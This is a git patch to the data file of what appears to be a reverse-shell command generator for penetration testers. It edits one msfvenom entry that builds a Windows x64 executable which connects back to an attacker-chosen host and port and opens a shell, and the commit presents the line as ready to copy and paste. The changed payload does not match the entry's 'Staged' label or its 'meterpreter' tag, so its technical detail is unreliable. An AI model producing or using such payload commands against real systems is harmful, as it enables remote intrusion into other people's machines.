From ccda4bee19a018330a22523aaf059211694da7c2 Mon Sep 17 00:00:00 2001 From: parzival <48874057+FreeZeroDays@users.noreply.github.com> Date: Fri, 11 Feb 2022 15:11:43 -0700 Subject: [PATCH] Fixing "Windows Staged Reverse TCP (x64)" Small typo for the command used to generate a Windows Staged Reverse TCP (x64). Modified the msfvenom payload to "windows/x64/shell_reverse_tcp" which should remediate this issue and allow for easier copypasta. --- js/data.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/js/data.js b/js/data.js index 85d02c2..69a16e3 100644 --- a/js/data.js +++ b/js/data.js @@ -350,7 +350,7 @@ const msfvenomCommands = withCommandType( }, { "name": "Windows Staged Reverse TCP (x64)", - "command": "msfvenom -p windows/x64/reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe", + "command": "msfvenom -p windows/x64/shell_reverse_tcp LHOST={ip} LPORT={port} -f exe -o reverse.exe", "meta": ["msfvenom", "windows", "staged", "meterpreter", "reverse"] }, {